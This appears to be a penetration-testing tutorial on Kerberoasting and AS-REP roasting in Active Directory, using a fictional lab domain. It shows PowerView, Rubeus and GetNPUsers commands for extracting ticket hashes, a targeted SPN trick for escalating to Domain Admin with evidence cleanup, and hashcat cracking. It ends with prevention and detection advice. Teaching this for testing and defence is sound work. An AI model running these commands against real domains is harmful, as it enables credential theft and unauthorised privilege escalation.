Kerberoasting & AS-REP Roasting in Active Directory — SPN Attacks, Rubeus, Hashcat

1. How Kerberos Authentication Works (Attack-Oriented)

Understanding what you're attacking makes the exploit make sense. Kerberos uses a ticket system to authenticate users to services without transmitting passwords over the network.

AS-REQ / AS-REP (Authentication): The client sends a request to the DC's Authentication Service. The DC verifies pre-authentication (a timestamp encrypted with the user's password hash) and returns a TGT (Ticket Granting Ticket) encrypted with the krbtgt account's hash.
TGS-REQ / TGS-REP (Service Ticket Request): The client presents its TGT and requests a TGS (Service Ticket) for a specific service (identified by its SPN). The DC returns a TGS encrypted with the service account's password hash.
AP-REQ (Service Authentication): The client presents the TGS to the service. The service decrypts it with its own password hash and grants access.

The Kerberoasting insight: Any authenticated domain user can request a TGS for any service in the domain — no special permissions required. The TGS is encrypted with the service account's hash. You take it offline and crack it. The DC logs the TGS request but sees nothing unusual — it's a legitimate operation.

2. Kerberoasting — Cracking Service Account Passwords

2.1 Finding Kerberoastable Accounts

Any user account with a Service Principal Name (SPN) set is Kerberoastable. SPNs identify services (SQL Server, IIS, Exchange, etc.) and are set on the service account that runs them. Machine accounts also have SPNs but use randomly generated, very long passwords — not worth cracking. Focus on user accounts with SPNs.

# Find all user accounts with SPNs set (Kerberoastable)
PS C:\AD\Tools> Get-DomainUser -SPN | select samaccountname, serviceprincipalname

# Example output:
samaccountname    serviceprincipalname
--------------    --------------------
masaaki_mssql     MSSQLSvc/masaaki-mssql.masaaki-corp.local:1433
masaaki_iis       HTTP/masaaki-web01.masaaki-corp.local
stephane_svc      MSSQLSvc/masaaki-mssql.masaaki-corp.local:1434

# Using the native AD module
PS C:\AD\Tools> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | select Name, ServicePrincipalName

# Prioritise: check if any Kerberoastable account is in a privileged group
PS C:\AD\Tools> Get-DomainUser -SPN | Get-DomainGroup -UserName {$_.samaccountname} | select name

2.2 Requesting TGS Tickets with PowerView

# Request TGS and get the hash in crackable format
PS C:\AD\Tools> Get-DomainSPNTicket -SPN "MSSQLSvc/masaaki-mssql.masaaki-corp.local:1433" | fl

# Get ALL Kerberoastable tickets in one shot
PS C:\AD\Tools> Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat | Out-File kerberoast-hashes.txt

# Hash format (RC4/NTLM encryption — type 23):
$krb5tgs$23$*masaaki_mssql$MASAAKI-CORP.LOCAL$MSSQLSvc/masaaki-mssql.masaaki-corp.local:1433*$A3F2B1...

2.3 Kerberoasting with Rubeus

Rubeus is a C# Kerberos toolkit that requests tickets natively without relying on PowerShell or .NET reflection. It's harder to detect and supports AES tickets (type 18) as well as the older RC4 (type 23).

# Kerberoast all accounts and output hashes directly
C:\AD\Tools> .\Rubeus.exe kerberoast /outfile:kerberoast.txt

# Kerberoast a specific user
C:\AD\Tools> .\Rubeus.exe kerberoast /user:masaaki_mssql /outfile:masaaki_mssql.txt

# Force RC4 encryption (easier to crack than AES-256)
C:\AD\Tools> .\Rubeus.exe kerberoast /rc4opsec /outfile:kerberoast-rc4.txt

# Statistics only — see how many accounts are vulnerable without requesting tickets
C:\AD\Tools> .\Rubeus.exe kerberoast /stats

RC4 vs AES: When you request a TGS, Windows will use RC4 encryption by default if the account supports it (most do). RC4 tickets (type 23) crack significantly faster than AES-256 (type 18). Rubeus /rc4opsec specifically requests RC4 — use this for cracking speed.

3. AS-REP Roasting — No Pre-Auth Accounts

Kerberos pre-authentication is the mechanism that proves you know the password before the DC sends you anything useful: the client encrypts the current timestamp with its password hash and sends it in the AS-REQ. The DC decrypts it and verifies the timestamp.

If DONT_REQ_PREAUTH is set on an account, pre-authentication is skipped entirely. An attacker can send an AS-REQ for that account without knowing the password and the DC returns an AS-REP containing data encrypted with the account's password hash — ready to crack offline.

3.1 Finding AS-REP Roastable Accounts

# Find accounts with DONT_REQ_PREAUTH set using PowerView
PS C:\AD\Tools> Get-DomainUser -UACFilter DONT_REQ_PREAUTH | select samaccountname, userprincipalname

# Using the AD module
PS C:\AD\Tools> Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth | select Name

# Example output:
samaccountname
--------------
masaaki_legacy
stephane_test

3.2 Extracting AS-REP Hashes with Rubeus

# AS-REP roast all vulnerable accounts
C:\AD\Tools> .\Rubeus.exe asreproast /outfile:asrep-hashes.txt

# AS-REP roast a specific user
C:\AD\Tools> .\Rubeus.exe asreproast /user:masaaki_legacy /outfile:masaaki_legacy.txt

# Hash format (type 18 — krb5asrep):
[email protected]:B3A2C1D4E5F6...

3.3 AS-REP Roasting Without Credentials (Unauthenticated)

AS-REP Roasting is unique: if you know the username, you don't even need a valid domain account. This makes it viable from outside the domain — during external assessments or before you've compromised any credentials.

# From Linux — no domain credentials needed, just a valid username
python3 GetNPUsers.py masaaki-corp.local/masaaki_legacy -no-pass -dc-ip 192.168.1.10

# Test a list of usernames
python3 GetNPUsers.py masaaki-corp.local/ -usersfile usernames.txt -no-pass -dc-ip 192.168.1.10 -format hashcat

# Using Rubeus from Windows (provide DC IP instead of relying on DNS)
C:\AD\Tools> .\Rubeus.exe asreproast /domain:masaaki-corp.local /dc:192.168.1.10 /outfile:asrep.txt

4. Targeted Kerberoasting — Creating the Vulnerability

You don't need to find a pre-existing service account with an SPN. If you have GenericWrite or GenericAll on any user account (found in Blog 1 via ACL enumeration), you can set a fake SPN on that account, making it instantly Kerberoastable — even if it's a Domain Admin account.

# Scenario: masaaki has GenericWrite on stephane (a DA)
# Step 1: Set a fake SPN on stephane
PS C:\AD\Tools> Set-DomainObject -Identity stephane -Set @{serviceprincipalname='fake/masaaki-dc01'} -Verbose

# Step 2: Request TGS for the fake SPN
PS C:\AD\Tools> Get-DomainSPNTicket -SPN "fake/masaaki-dc01" -OutputFormat Hashcat

# Step 3: Crack offline
# Step 4: CLEAN UP — remove the fake SPN
PS C:\AD\Tools> Set-DomainObject -Identity stephane -Clear serviceprincipalname -Verbose

This is extremely powerful: If a DA account has a weak password, you can escalate directly to Domain Admin through targeted Kerberoasting — no need to find a service account. Always clean up the SPN to avoid leaving evidence and breaking the account.

5. Offline Cracking with Hashcat

Both Kerberoasting and AS-REP Roasting produce hashes you crack offline — no further interaction with the DC needed. Speed depends entirely on your GPU and the wordlist quality.

# Kerberoasting hash (type 23 — RC4)
hashcat -m 13100 kerberoast-hashes.txt /usr/share/wordlists/rockyou.txt

# Kerberoasting hash (type 19700 — AES-128) or type 19600 (AES-256)
hashcat -m 19700 kerberoast-hashes.txt /usr/share/wordlists/rockyou.txt

# AS-REP Roasting hash (type 18)
hashcat -m 18200 asrep-hashes.txt /usr/share/wordlists/rockyou.txt

# Add rules for better coverage (mutates wordlist — catches Password1!, P@ssw0rd, etc.)
hashcat -m 13100 kerberoast-hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# Use a targeted corporate wordlist (company name, year, city)
hashcat -m 13100 kerberoast-hashes.txt corporate-wordlist.txt -r /usr/share/hashcat/rules/d3ad0ne.rule --force

# Check cracked passwords
hashcat -m 13100 kerberoast-hashes.txt --show

Wordlist strategy: Service accounts often have predictable passwords set by admins: ServiceName2024!, Masaaki@2024, Summer2025!. Build a custom wordlist from the organisation's name, year, city and common patterns — this outperforms rockyou for enterprise service accounts.

6. Prevention & Detection

Use Strong Service Account Passwords (25+ chars)

A 25+ character random password makes Kerberoasting hashes computationally infeasible to crack. Use Group Managed Service Accounts (gMSA) — passwords are 120 characters, randomly generated, auto-rotated by AD.

Audit and Remove Unnecessary SPNs

Run Get-DomainUser -SPN quarterly. Remove SPNs from user accounts that no longer run services. Every SPN on a user account is a potential crack target.

Disable DONT_REQ_PREAUTH

Review all accounts with this flag (DONT_REQ_PREAUTH) and remove it unless absolutely required by a legacy application. It was historically needed for older non-Windows Kerberos clients.

Monitor TGS Requests

Alert on event 4769 (Kerberos Service Ticket Requested) where Ticket Encryption Type is 0x17 (RC4). Legitimate environments use AES. A burst of RC4 TGS requests from a single account is a Kerberoasting IOC.

Enforce AES Encryption

Set msDS-SupportedEncryptionTypes to only allow AES-128 and AES-256 on service accounts. This forces AES tickets which are slower to crack. Combined with long passwords, this makes Kerberoasting impractical.

Honeypot Kerberoastable Account

Create a fake service account with an SPN and a very complex password. Monitor event 4769 for TGS requests against this account. Any hit is an attacker — alert immediately.